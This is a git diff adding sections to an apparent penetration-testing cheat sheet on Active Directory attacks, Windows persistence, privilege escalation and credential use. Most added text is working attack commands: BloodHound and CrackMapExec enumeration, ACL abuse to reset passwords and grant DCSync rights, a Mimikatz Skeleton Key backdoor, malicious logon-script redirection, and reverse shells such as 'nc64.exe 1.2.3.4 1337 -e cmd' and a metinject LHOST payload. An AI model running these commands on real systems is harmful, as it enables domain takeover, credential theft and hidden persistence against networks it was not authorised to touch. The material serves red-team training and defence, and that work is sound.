diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ce4d6d8..489fcd1 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -46,6 +46,9 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [WriteDACL](#writedacl) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) @@ -71,38 +74,50 @@ * [BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell - apt install bloodhound #kali - neo4j console + # start BloodHound and the database + root@payload$ apt install bloodhound #kali + root@payload$ neo4j console + root@payload$ ./bloodhound Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - ./bloodhound - SharpHound.exe (from resources/Ingestor) - SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb -SearchForest - SharpHound.exe --EncryptZip --ZipFilename export.zip - or + + # run the ingestor on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/SharpHound3 + .\SharpHound.exe (from resources/Ingestor) + .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder + + # or run the ingestor on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - or + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all ``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - ```bash - apt-get install -y libssl-dev libffi-dev python-dev build-essential - git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - crackmapexec smb -L - crackmapexec smb -M name_module -o VAR=DATA - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - crackmapexec mimikatz --server http --server-port 80 + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) + root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 ``` * [Mitm6](https://github.com/fox-it/mitm6.git) @@ -1026,24 +1041,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ### Abusing Active Directory ACLs/ACEs -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` -* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` -* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group -* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` -* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` -* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'` - ```powershell - # give DCSync right to titi - Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync - ``` - Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` +#### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` + +GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. + +```powershell +# using PowerView +# Check for interesting permissions on accounts: +Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + +# Check if current user has already an SPN setted: +Get-DomainUser -Identity | select serviceprincipalname + +# Force set the SPN on the account: +Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} +``` + +#### GenericWrite + +* Reset another user's password + + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + + +#### WriteDACL + +To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +```powershell +# Give DCSync right to the principal identity +Import-Module .\PowerView.ps1 +$SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) +Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local +``` + ### Trust relationship between domains @@ -1571,4 +1621,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5 * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) * [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) -* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) \ No newline at end of file +* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) +* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 5f0b5ac..bd4ca44 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -17,6 +17,7 @@ * [Services](#services) * [Scheduled Task](#scheduled-task) * [RDP Backdoor](#rdp-backdoor) + * [Skeleton Key](#skeleton-key) * [References](#references) @@ -174,6 +175,15 @@ Hit F5 a bunch of times when you are at the RDP login screen. REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f ``` +### Skeleton Key + +```powershell +# Exploitation Command runned as DA: +Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName + +# Access using the password "mimikatz" +Enter-PSSession -ComputerName -Credential \Administrator +``` ## References diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index d4b05d6..c29fcbf 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -25,9 +25,11 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) +* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) @@ -718,6 +720,21 @@ $computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` +## EoP - Abusing Shadow Copies + +If you have local administrator access on a machine try to list shadow copies, it's an easy way for Privilege Escalation. + +```powershell +# List shadow copies using vssadmin (Needs Admnistrator Access) +vssadmin list shadows + +# List shadow copies using diskshadow +diskshadow list shadows all + +# Make a symlink to the shadow copy and access it +mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ +``` + ## EoP - From local administrator to NT SYSTEM ```powershell @@ -758,6 +775,37 @@ Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary bel |`SeTakeOwnership`| ***Admin*** | ***Built-in commands*** |1. `takeown.exe /f "%windir%\system32"`
2. `icalcs.exe "%windir%\system32" /grant "%username%":F`
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U| Attack may be detected by some AV software.

Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. | |`SeTcb`| ***Admin*** | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate.

To be verified. || +### Restore A Service Account's Privileges + +> This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only. + +```powershell +# https://github.com/itm4n/FullPowers + +c:\TOOLS>FullPowers +[+] Started dummy thread with id 9976 +[+] Successfully created scheduled task. +[+] Got new token! Privilege count: 7 +[+] CreateProcessAsUser() OK +Microsoft Windows [Version 10.0.19041.84] +(c) 2019 Microsoft Corporation. All rights reserved. + +C:\WINDOWS\system32>whoami /priv +PRIVILEGES INFORMATION +---------------------- +Privilege Name Description State +============================= ========================================= ======= +SeAssignPrimaryTokenPrivilege Replace a process level token Enabled +SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled +SeAuditPrivilege Generate security audits Enabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Enabled + +c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z +``` + ### Meterpreter getsystem and alternatives @@ -794,7 +842,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n ### Juicy Potato (abusing the golden privileges) Binary available at : https://github.com/ohpe/juicy-potato/releases -:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809. +:warning: Juicy Potato doesn't work on Windows Server 2019 and Windows 10 1809 +. 1. Check the privileges of the service account, you should look for **SeImpersonate** and/or **SeAssignPrimaryToken** (Impersonate a client after authentication) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index cd27039..b1148a3 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -9,6 +9,8 @@ * [Metasploit](#metasploit) * [Metasploit - SMB](#metasploit-smb) * [Metasploit - Psexec](#metasploit-psexec) +* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) +* [WinRM](#winrm) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) @@ -99,6 +101,22 @@ python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth ``` +## Remote Code Execution with PS Credentials + +```powershell +$SecPassword = ConvertTo-SecureString 'secretpassword' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\USERNAME', $SecPassword) +Invoke-Command -ComputerName DC01 -Credential $Cred -ScriptBlock {whoami} +``` + +## WinRM + +```powershell +root@payload$ git clone https://github.com/Hackplayers/evil-winrm +root@payload$ evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] +root@payload$ evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' +``` + ## Winexe Integrated to Kali diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg new file mode 100644 index 0000000..0f7053a Binary files /dev/null and b/XSS Injection/Files/mouseover-xss-ecs.jpeg differ diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg new file mode 100644 index 0000000..ccd2d0f Binary files /dev/null and b/XSS Injection/Files/onclick-xss-ecs.jpeg differ